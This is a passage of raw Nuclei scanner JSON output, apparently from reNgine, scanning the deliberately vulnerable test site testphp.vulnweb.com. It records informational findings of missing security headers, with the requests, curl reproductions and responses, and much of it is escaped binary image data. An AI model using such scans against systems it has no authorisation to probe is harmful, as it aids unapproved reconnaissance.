\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:17.142607562Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:17.721695345Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u